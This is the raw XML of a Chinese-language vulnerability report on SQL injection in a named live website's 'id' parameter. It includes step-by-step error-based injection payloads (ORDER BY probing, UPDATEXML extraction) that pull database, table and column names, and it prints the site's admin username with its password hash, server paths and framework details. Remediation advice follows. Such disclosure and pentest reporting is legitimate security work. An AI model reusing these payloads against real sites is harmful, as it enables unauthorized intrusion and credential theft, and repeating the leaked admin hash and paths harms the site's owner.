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16616">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>SQL 注入漏洞综合报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37D4F9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. 漏洞概述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4155"/>
      </w:tblGrid>
      <w:tr w14:paraId="498C9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5B11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31E214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421F7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614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漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3810C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 注入（SQL Injection）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F707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774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漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A489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 高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="244C0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00B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影响站点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60183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"http://www.dlhayashi.com"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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://www.dlhayashi.com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4A99A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E12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影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09473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数据库信息泄露、管理员账号密码获取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4BEDD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353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漏洞状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E2214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已确认</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="695EF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739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测试时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02EE8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2026-03-09 ~ 2026-03-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D87C41">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. 技术细节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C920F22">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 漏洞位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E961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URL</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB7A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注入点</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB2A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漏洞原因</w:t>
      </w:r>
      <w:r>
        <w:t>：应用程序未对用户输入进行参数化处理，直接将用户输入拼接到 SQL 语句中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837E01C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 数据库信息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3555"/>
      </w:tblGrid>
      <w:tr w14:paraId="43FCD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7543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6206BD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3B08F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AE3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数据库名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15E671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qdm177261645_db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7CEA1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D25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4AA8E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jm_admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="44CE4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0D8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30857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id, username, password, group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1736918E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 成功获取的数据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3315"/>
      </w:tblGrid>
      <w:tr w14:paraId="42FB3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F911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用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C2576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密码（加密）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F37C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58E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D547D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90763170887b9ef5a364fbfb115</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="441C22E4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. 复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452E7DE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 注入点确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373636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访问：http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BF8F3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结果：观察到 SQL 错误信息，确认存在 SQL 注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07052870">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 字段数确定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51723AF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测试 1: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1 ORDER BY 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015EF4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结果：成功（页面正常显示）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64E06F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268991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测试 2: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1 ORDER BY 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A98C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结果：失败（出现 SQL 错误）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B86172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110DD0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结论：查询结果有 6 列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E1029">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2088515"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="1" name="图片 1" descr="file-20260312100702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le-202603121007025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7877">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 数据库信息获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A386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Payload: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A547B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AND UPDATEXML(1, CONCAT(0x7e, database()), 0x7e), 1) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B466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31908F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结果：成功获取数据库名 qdm177261645_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC51A4">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="2135505"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10795"/>
            <wp:docPr id="2" name="图片 2" descr="file-20260312100725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le-202603121007255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E2E8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 表名获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4A3E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Payload: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6801E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AND UPDATEXML(1, CONCAT(0x7e, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572B210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(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229706B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WHERE table_schema=database()), 0x7e), 1) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E751A9F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6D57B7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结果：成功获取表名 jm_admin, jm_en, fenlei, jm_on, jm_hdj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69354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3" name="图片 3" descr="file-20260312100738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le-2026031210073839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1721">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 字段名获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD7DF6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Payload: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317776F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AND UPDATEXML(1, CONCAT(0x7e, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC037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(SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CE73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WHERE table_schema=database() AND table_name='jm_admin'), 0x7e), 1) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D26E68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0F6E0A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结果：成功获取字段名 id, username, password, group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43D58C">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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4" name="图片 4" descr="file-20260312100749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le-202603121007499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A2E9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 管理员账号密码获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBB0D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Payload: http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D3AD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AND UPDATEXML(1, CONCAT(0x7e, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CF14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(SELECT CONCAT(username, ':', password) FROM jm_admin LIMIT 1), 0x7e), 1) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50558E4D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257D2F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结果：成功获取管理员账号密码 admin:90763170887b9ef5a364fbfb115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9462A8">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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5" name="图片 5" descr="file-2026031210080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le-202603121008011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1E11">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4. 漏洞验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D718426">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 错误信息验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9B9B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SQL 错误消息："XPATH syntax error: 'qdm177261645_db'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4C81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SQL 语句："SELECT jm_text.* FROM jm_text WHERE 10 AND UPDATEXML(1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BFFBE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CONCAT(0x7e, database()), 0x7e), 1) -- LIMIT 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE8A5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SQL 错误代码："7335941"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446ABD6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8310B89">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 数据获取验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCCEB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SQL 错误消息："XPATH syntax error: 'admin:90763170887b9ef5a364fbfb115'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12581DC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SQL 语句："SELECT jm_text.* FROM jm_text WHERE 10 AND UPDATEXML(1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140E91D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CONCAT(0x7e, (SELECT CONCAT(username, ':', password) FROM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4306D33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jm_admin LIMIT 1), 0x7e), 1) -- LIMIT 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E0A2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SQL 错误代码："7335941"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E6129">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 技术栈信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7954A5D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网站框架：FLEA (FLEA.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D244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数据库：MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD629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服务器路径：/usr/home/qxu1587640101/htdocs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4E83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PHP 文件：/usr/home/qxu1587640101/htdocs/libs/FLEA/FLEA/Db/Driver/Mysql.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FAA22">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>5. 影响分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A5AEF">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 安全影响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7"/>
        <w:gridCol w:w="1014"/>
        <w:gridCol w:w="5765"/>
      </w:tblGrid>
      <w:tr w14:paraId="4A127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BFD0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影响类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34AC6D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shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BA805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A77E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1BB5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 信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2164D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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A8C2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攻击者可以获取数据库中的敏感信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1EBAF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CCC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 权限提升</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47848E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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66A2D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获取管理员账号密码后，攻击者可能登录后台管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="08358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9A8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🟠 数据篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43824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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2709C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攻击者可能修改数据库中的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="46C0C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813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🟠 服务器控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52698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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69546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在某些情况下，可能通过 SQL 注入获取服务器权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13B8DAFA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 业务影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB6D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网站管理权限</w:t>
      </w:r>
      <w:r>
        <w:t>：管理员账号被泄露可能导致网站被恶意修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5D3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客户数据</w:t>
      </w:r>
      <w:r>
        <w:t>：如果数据库中存储了客户信息，可能导致客户数据泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC85C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品牌声誉</w:t>
      </w:r>
      <w:r>
        <w:t>：安全漏洞可能影响公司的品牌声誉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A31F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合规风险</w:t>
      </w:r>
      <w:r>
        <w:t>：可能违反网络安全法等相关法律法规</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC4C5A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6. 修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB3704">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 立即修复（24 小时内）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F1607">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. 使用参数化查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A627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❌ 错误示例（当前代码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCECB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$id = $_GET['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088552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$sql = "SELECT * FROM jm_text WHERE id = $id";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12696006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385997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✅ 正确示例（参数化查询）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200488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$id = $_GET['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813041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$stmt = $db-&gt;prepare("SELECT * FROM jm_text WHERE id = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB92F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$stmt-&gt;execute([$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983188E">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. 输入验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E476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对 id 参数进行类型检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759639F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$id = intval($_GET['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18511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if ($id &lt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E0329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die('Invalid ID');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98220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61AB9FB2">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. 错误处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68234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❌ 不要在生产环境显示详细错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F027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echo $e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F27DD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57AFFB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✅ 记录错误日志，显示友好提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CEF4A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error_log($e-&gt;getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AB7D2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die('系统错误，请联系管理员');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F02BD">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4. 权限控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073C52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-- 限制数据库用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5846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REVOKE ALL PRIVILEGES ON *.* FROM 'web_user'@'%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAECA5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GRANT SELECT, INSERT, UPDATE, DELETE ON qdm177261645_db.* TO 'web_user'@'%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF88F3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 长期修复（1 周内）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1094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代码审计</w:t>
      </w:r>
      <w:r>
        <w:t>：对整个代码库进行安全审计，查找其他潜在的 SQL 注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B08D9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安全培训</w:t>
      </w:r>
      <w:r>
        <w:t>：对开发人员进行安全编码培训</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B79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WAF 部署</w:t>
      </w:r>
      <w:r>
        <w:t>：考虑部署 Web 应用防火墙，拦截 SQL 注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25436C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定期安全测试</w:t>
      </w:r>
      <w:r>
        <w:t>：定期进行安全测试，及时发现和修复漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF0E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密码加密</w:t>
      </w:r>
      <w:r>
        <w:t>：建议使用更强的密码加密算法（如 bcrypt、Argon2）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6721B7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>7. 时间线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700"/>
        <w:gridCol w:w="915"/>
      </w:tblGrid>
      <w:tr w14:paraId="73C4E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EAA5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740057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事件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52366A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3ADCC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C9D7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2026-03-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2EB48A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发现 SQL 注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E1E6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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06D3C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DC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2026-03-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3F8EBC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确认注入点并确定字段数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
